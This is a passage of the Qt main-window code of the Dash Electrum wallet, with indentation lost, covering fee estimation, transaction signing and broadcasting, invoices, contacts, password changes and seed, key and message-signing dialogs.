self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
w.setObjectName("send_container")
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
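# When the Pay-to field is still empty this falls back to a wallet-internal
# dummy address, so do_update_fee can build a draft transaction and estimate
# its size and fee before a real recipient has been entered.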
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
return
(outputs, fee_estimator, tx_desc, coins,
tx_type, extra_payload) = self.read_send_tab()
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
coins, outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep,
tx_type=tx_type, extra_payload=extra_payload)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
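# Worked example (illustrative numbers): with a displayed feerate of
# 1000 duffs/kB and an estimated size of 226 bytes, the displayed fee is
# round(1000 * 226 / 1000) = 226 duffs; the feerounding icon below reports
# the difference between this and the actual tx.get_fee().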
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee * 1000 / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size / 1000) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee * 1000 / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.max_button.isChecked():
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates an unencrypted
wallet; if the user cancels the password request, the wrapped
function is not called at all. An empty input is passed as the
empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
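# Illustrative usage (method name is hypothetical): a method decorated with
# @protected gains a 'password' keyword filled in after prompting the user:
#
#   @protected
#   def export_something(self, path, password):
#       ...  # password is None for wallets without keystore encryption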
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount()  # duffs/kB feerate
amount = 0 if amount is None else amount  # duffs/kB feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
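# The returned estimator is either an absolute fee in duffs (when fee_e is
# frozen), a callable mapping a tx size to a fee at the frozen feerate, or
# None to let the wallet choose; it is passed as fixed_fee to
# make_unsigned_transaction.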
def read_send_tab(self):
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
tx_type, extra_payload = self.extra_payload.get_extra_data()
return outputs, fee_estimator, label, coins, tx_type, extra_payload
def check_send_tab_outputs_and_show_errors(self, outputs) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.address is None:
self.show_error(_('Dash Address is None'))
return True
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Dash Address'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
(outputs, fee_estimator, tx_desc, coins,
tx_type, extra_payload) = self.read_send_tab()
if self.check_send_tab_outputs_and_show_errors(outputs):
return
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep,
tx_type=tx_type, extra_payload=extra_payload)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
if tx.tx_type:
try:
tx.extra_payload.check_after_tx_prepared(tx)
except DashTxError as e:
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
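# Signing runs in a background thread via WaitingDialog; on_success/on_failure
# fire when it finishes, and plugins may wrap these callbacks through the
# 'tc_sign_wrapper' hook before signing starts.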
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
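# broadcast_thread runs off the GUI thread and returns (status, msg), where
# msg is the txid on success or a human-readable error otherwise;
# broadcast_done then optionally labels the transaction and refreshes the
# invoice list back on the GUI thread.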
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_kb())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.extra_payload.clear()
self.hide_extra_payload()
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
l.setObjectName("addresses_container")
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
l.setObjectName("utxo_container")
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
l.setObjectName("contacts_container")
return self.create_list_tab(l)
def create_proposals_tab(self):
from .masternode_budget_widgets import ProposalsTab
self.proposals_list = ProposalsTab(self)
return self.proposals_list
def update_proposals_tab(self):
# Disabled until API is stable.
return
if not self.masternode_manager:
return
self.proposals_list.update(list(self.network.all_proposals))
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def hide_extra_payload(self):
self.extra_payload.hide()
self.extra_payload_label.hide()
def show_extra_payload(self):
self.extra_payload.show()
self.extra_payload_label.show()
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
console.setObjectName("console_container")
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum_dash,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
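# Each public command name of commands.Commands is bound in the console
# namespace; mkfunc wraps c._run so that calling the name executes the
# command, with password prompts routed through self.password_dialog.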
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setObjectName("main_window_balance")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum_dash.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Dash Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Dash address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Dash address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
